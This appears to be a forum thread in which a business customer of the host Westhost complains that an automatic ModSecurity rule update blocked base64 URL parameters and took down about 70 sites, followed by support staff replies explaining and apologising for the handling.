Unbelievable, all our sites across two dedicated servers were down (still are down)

How can Westhost make changes to both our dedicated servers causing ALL our websites to lose their stylesheets and in effect take down the sites? We talked to level 1 two hours ago, we put in an emergency ticket, and after ZERO action I had to call to talk to a tech and literally tell him what the problem was!

I spoke with the (I assume) level 1 tech explaining this looks like a mod_security issue because we are passing a base_64 encoded url parameter to a php file which generates our stylesheets. They are all now giving us a 403 forbidden error. The level 1 tech told me it was not a mod_security after placing me on hold for a couple minutes. I told him he was wrong it was DEFINITELY a mod_security issue. A few minutes on hold and he comes back to tell me it's a mod_security issue.

Apparently mod_security makes updates like an anti-virus program updating. We did not know about this, nobody told us, nobody warned us, it's not in any documentation or any agreement we signed or any order sheet. This auto-update took down all our sites (was all working fine yesterday). In the last hour we've lost 4 client accounts due to this at $4000 per year EACH. The issue is STILL NOT RESOLVED.

THIS IS COMPLETELY UNACCEPTABLE. How can changes be made to our dedicated servers without our knowledge that take down all our revenue generating sites?

After 6 hours from our initial customer service contact a Level 2 tech contacted us via email on the ticket system asking for account validation and referencing a single site versus the 70 sites on both dedicated server. I called customer service (4th time in 2 hours) and had them patch me into the Level 2 tech. I spoke with him and he said that every single domain would need a mod security exception and it would take 1.5-2 hours if he was not interrupted by something like a "server doing down". To which I responded OUR SERVERS ARE ESSENTIALLY DOWN. ALL SITES. We've now officially lost 5 of our business clients representing $20,000 ANNUALLY as we have a subscription b2b web app hosted here.

I want to know, what is Westhost going to do about this? We're still down, our staff has had phones lit up for 6 hours and almost 300 emails from our customers wanting to know what happened and when it will be back up (to which we have had no answer as we could not get one form Westhost). We've lost customers, money, reputation. We paid for dedicated servers using the same codebase as we have for almost 8 years. What NOW? I am beside myself in anger and frustration. THIS IS THE WORST BUSINESS DISASTER in the history of our company.

As I stated, on the phone, I apologize for the inconvenience and problems this ModSecurity update caused you. We did make the exceptions you requested.

To answer your question as to how we can make changes to your dedicated servers without notifying you, you purchased a managed server, meaning you wanted us to take care of all the server-side details, including security. If you had not wanted us to take care of these things for you, you would have purchased an unmanaged server. As part of preserving server security, we implement ModSecurity rules, which do change and update, as new threats are discovered. If websites trigger these rules, once we have been notified, we evaluate what is triggering the rule, and what the rule is meant to block. In some instances, we make exceptions to these rules, on a per-directory basis, so as to minimize the threat to the account.

In this instance, the rule was blocking the base64 strings being included in your URLs. The reason for this is that it is very simple for a hacker to to encode a malicious set of instructions in base64 and pass them to one of your pages, causing that site to execute whatever is in the base64 string, whether that is to upload a shell, one of the most common, or to initiate an attack on another site, also very common, or to start sending spam, and you would have no control to stop them, as the door was already open for them.

This issue did not come to light on the older, Site Manager, system because we left more of the security to you, the client. In the newer, cPanel platform, however, we have taken on more of the security aspect of the accounts. We apologize for any frustration this may cause. Ultimately, we have seen a large decrease in hacked sites and accounts since taking this on, indicating, to us, that what we are doing is working, and is worth whatever other usability issues may arise.

I hope this answers your questions and resolves some of your concerns. If you have any other questions or concerns, please feel free to respond to your ticket and I will be more than happy to address them.

Explain something then

We've been on this generation of server for many months running the same codebase. Not the last generation, the current one. Is it reasonable that the codebase that has been working for months suddenly stops working and every single site on both dedicated servers suddenly stop working properly. How is this reasonable?

Now that the situation has been more or less resolved, the main issue we have is how the support was handled on this incident.

Specifically, we contacted level 1 support immediately (8am your time) and he told us he would create a ticket on our behalf and escalate the ticket seeing as all our sites were down. We heard nothing for an hour. We put in a high priority ticket at 9am your time. We've spoken to five separate level 1 customer support people in addition to the ticket trying to get someone to help us with this situation. Nearly 5.5 hours after our noticing there was a problem, 4.5 hours from the high priority ticket, is the first time you saw/touched the ticket.

The first email we got from you was asking about account validation. Perhaps this could have happened at the level 1 support within the first 5 hours or initial contact we had at 8am your time. Then the email you sent me asking about the "specific problem" which I outlined in detail in the ticket with explicit details of the problems, examples of how to make the problem appear and disappear using specific URLs showing how the parameters caused mod security to give us a 403 forbidden error.

The email I got back had this paragraph:

Before I can add exceptions for the rest of the accounts, I will need to also obtain error messages for every domain that is experiencing this problem. To do so, I will need to replicate the problem. In order for me to replicate the problem, I will need to get step-by-step instructions on how to recreate the problem, including any required login information, for each, and every, domain that is experiencing these issues.

I caused enough of an issue with Steve (level 1 tech) that he patched me through directly through to you on the phone because I had thought I'd outlined the issue very explicitly. I can post the entire ticket with the timestamps here including our correspondence if you wish.

In our phone call, you re-iterated that you needed to know the exact nature of the problem, that I would have to supply the username/password for every domain affected (even though it was all of them) and give specific examples of each problem on each domain. I explained that it was in the ticket, and on the phone we went through it so that you understood the problem. Your quote to me on the phone was "this is on every domain?" which was CLEARLY indicated hours ago in the ticket, SEVERAL TIMES prior to our phone conversation.

If I did not have experience dealing with this specific issue before I don't know how long this resolution would have taken. I had to explain it to the Level 1 techs (each one because each tech goes through the same exact script that I went through 15 minutes ago with the previous tech aside from Steve who is your best IMHO) I had to also explain the issue with you because it wasn't an error per se but the result of the mod sec ruleset.

After agreeing on a course of action, you said that if your workload was uninterrupted it would take 1.5-2 hours to go through every domain to make the exceptions unless you were interrupted due to a server going down or something similar to which I replied "what do you think we are going through now? ALL OUR DOMAINS ARE DOWN, how is this not the same as a server going down?"

A few minutes after our conversation was over, as I was watching the ticket, it was marked RESOLVED. Sites were still all down. I called customer service and pretty much went off the chain and they said they messaged you. You messaged us back saying it was in error and you closed the wrong ticket. Okay I understand that happens, but didn't help the situation.

At approximately 8:45pm your time (just under 12 hours from our high priority ticket being submitted) the domains were back online. (and thank you for being prompt once we actually got the issue in front of you Reed)

So after causing hell on earth for our own customer service department, losing customers (thankfully we may be able to recover these by explaining the scenario today), I'm hearing you say that it's basically our fault and Westhost is blameless in this situation.

We have been customers of Westhost since 2004. We've suffered through the outage fiasco in 2010 where everything went down horribly for all Westhost customers for 48+ hours. It's not like we aren't loyal customers.

I understand things go wrong from time to time, but seriously this "customer support" that should be coming with "managed servers" has left us faithless. Dedicated server customers are treated no differently from shared hosting customers. We are paying 1.5x to 2x what other webhosts (who are higher ranked in several metrics) are charging for the same dedicated server specification (or better).

I'll end this by saying we went to you guys because you used to be at the top of the game. When we first started with you the customer support was immediate and FAST. In 2006 you were in the top 10 (maybe top 5) of every webhost ranking. You've won awards for several years after that. You famously advertised that Netcraft ranked you #1 I believe in 2008. Today you aren't even on the lists including Netcraft. Whether this is because your competitors outpaced you or that you slipped due to transitions/buyout/whatever, it should be clear that this isolated incident isn't the reason.

I want to make sure that we have things worked out for you, and I do apologize for the frustration caused by the ModSecurity rule and the course of action that we took in working on this issue for you.

It sounds like you had a number of different calls, and perhaps a number of different tickets on this same issue. I know that having multiple support requests on the same issue can result in partial data hitting different technicians, causing delays or confusion in an overall response time. I apologize for the frustration that caused and will definitely work with my team to make improvements namely on communication so our support can be more effective.

With ModSecurity, updates can occur at any time. We usually apply them every couple of weeks for all servers that we maintain. As mentioned, these tools are put in place for our shared and managed hosting solutions to try and relieve some of the stress from security management for your hosting service. It's not intended to be a hurdle in site performance, but in this instance a new trigger based on the coding of your site effectively brought services to a stop. We can definitely work with our administrative teams to see what we can do in such situations to more rapidly resolve the issue and still provide you with a similar level of security.

ModSecurity is implemented in such a way that we add exceptions to rules based on the cPanel user and the directory or specific file where the error occurs. This can definitely slow down a resolution when there are many sites affected by a single trigger, or a variety of different folders where the exception needs to be added. Reed was able to have our admins write a quick script to automatically go through and get all of those exceptions added across your servers, though it still took some time to configure and complete.

I hope that you do not think of Reed's response as trying to remove blame from the situation, though we can definitely position such information more effectively for increased understanding on both sides of the conversation. In an attempt to explain how things worked and Reed's viewpoint of how the situation was laid out, we did want to make sure that you knew why ModSec was in place, why it behaved in the way it did, and the description of how we were able to provide support.
I appreciate our relationship with you and want to be sure we are able to continue that for as long as we provide service. We are continually growing and working to provide the premium support that we have over the many years we've been in business.

I will follow up with you through your ticket and give you a call back, per your request. I am hopeful that I will be able to provide you some more meaningful information as well as a satisfactory course of action.